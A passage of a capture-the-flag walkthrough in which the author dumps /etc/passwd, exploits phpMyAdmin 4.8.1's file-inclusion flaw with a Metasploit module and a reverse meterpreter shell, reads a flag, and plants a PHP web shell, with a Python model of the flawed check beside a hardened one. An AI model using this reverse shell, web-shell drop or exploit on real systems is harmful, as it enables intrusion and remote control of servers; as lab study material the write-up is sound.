list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
morty:x:1000:1000:Morty Smith:/home/morty:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
bind:x:112:118::/var/cache/bind:/usr/sbin/nologin
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false

The only interactive account besides root is morty.

Wappalyzer identifies phpMyAdmin 4.8.1. Versions 4.8.0 and 4.8.1 have an authenticated local file inclusion in index.php's target parameter (CVE-2018-12613), which becomes code execution by including a file whose contents the attacker controls, for example the PHP session file after running a query that contains PHP code. A write-up of the technique:

https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e

Metasploit has it as multi/http/phpmyadmin_lfi_rce; it needs valid phpMyAdmin credentials, so rick's go in:
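What the LFI exploits is a whitelist check that inspects a different string than the one include() receives. The Python below is an added example, not the write-up's code and not phpMyAdmin's: it models checkPageValidity() and the index.php gate around it from memory of the 4.8.1 source, next to a hardened exact-match version, and shows that the classic db_sql.php%3f/../ payload (sent double-encoded as %253f on the wire, so that PHP's own decoding leaves %3f in the value) passes the first but not the second. GOTO_WHITELIST and TARGET_BLACKLIST are small reconstructions of the real lists and are assumptions.

```python
"""Model of phpMyAdmin 4.8.0/4.8.1's `target` validation (CVE-2018-12613).

Added example, not part of the original write-up, and written from memory of
the 4.8.1 source rather than copied from it: index.php included
$_REQUEST['target'] once Core::checkPageValidity() accepted it, and that
check compared only the part of the value before the first '?', trying
again after a urldecode().  A value that merely begins with a whitelisted
page name therefore passes, while include() is given the whole string.
GOTO_WHITELIST / TARGET_BLACKLIST are assumed subsets of the real lists.
"""
from urllib.parse import unquote

GOTO_WHITELIST = ["db_sql.php", "db_structure.php", "server_sql.php",
                  "sql.php", "tbl_sql.php", "tbl_structure.php"]
TARGET_BLACKLIST = ["import.php", "export.php"]


def _before_question_mark(page: str) -> str:
    """mb_substr($page, 0, mb_strpos($page . '?', '?')) in the PHP original."""
    return page.split("?", 1)[0]


def check_page_validity_vulnerable(page: str, whitelist=GOTO_WHITELIST) -> bool:
    """The 4.8.1 logic: accept if any truncated or decoded form is whitelisted."""
    if not page:
        return False
    if page in whitelist:
        return True
    if _before_question_mark(page) in whitelist:
        return True
    decoded = unquote(page)                    # extra decode: %3f becomes '?'
    return _before_question_mark(decoded) in whitelist


def check_page_validity_hardened(page: str, whitelist=GOTO_WHITELIST) -> bool:
    """Exact match only: no truncation, no decoding, nothing for a path to hide in."""
    return isinstance(page, str) and page in whitelist


def would_include(target: str, check) -> bool:
    """index.php's gate around include($_REQUEST['target']) with a given check."""
    return (bool(target)
            and not target.startswith("index")        # preg_match('/^index/')
            and target not in TARGET_BLACKLIST
            and check(target))


# What PHP sees after decoding the public PoC request once:
#   index.php?target=db_sql.php%253f/../../../../etc/passwd
LFI_TARGET = "db_sql.php%3f/../../../../etc/passwd"

if __name__ == "__main__":
    print("4.8.1 includes it:   ", would_include(LFI_TARGET, check_page_validity_vulnerable))
    print("hardened includes it:", would_include(LFI_TARGET, check_page_validity_hardened))
```

The general lesson is the one that applies to every "validate then use" pair: the value that is validated must be byte-for-byte the value that is used, with no decoding, truncation or normalisation in between.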

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show options

Module options (exploit/multi/http/phpmyadmin_lfi_rce):

   Name       Current Setting                     Required  Description
   ----       ---------------                     --------  -----------
   PASSWORD   WubbaLubbaDubDub1!                  no        Password to authenticate with
   Proxies                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.150.150.57                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                                  yes       The target port (TCP)
   SSL        false                               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                                   yes       Base phpMyAdmin directory path
   USERNAME   rick                                yes       Username to authenticate with
   VHOST      rickscontrolpanel.mortysserver.com  no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.66.66.42      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.66.66.42:4444 
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > [*] Sending stage (39282 bytes) to 10.150.150.57
[*] Meterpreter session 1 opened (10.66.66.42:4444 -> 10.150.150.57:42974) at 2021-03-13 14:58:15 +0000

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information            Connection
  --  ----  ----                   -----------            ----------
  1         meterpreter php/linux  www-data (33) @ morty  10.66.66.42:4444 -> 10.150.150.57:42974 (10.150.150.57)

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 9802 created.
Channel 0 created.


cd user/morty

cat FLAG3.txt
73ce6cecfc1109f1e43d379fd9922dcc699af321

Later I found that the phpMyAdmin directory itself is writable by www-data, so a plain web shell can be dropped from the shell obtained above (the inner quotes must differ from the outer ones, otherwise the shell strips them and the PHP is left with a bare cmd):

echo '<?php system($_GET["cmd"]); ?>' > shell.php
pwd
/var/www/html/rickscontrolpanel/public_html/phpmyadmin

and then access

http://rickscontrolpanel.mortysserver.com/shell.php?cmd=whoami

Author : Puckiestyle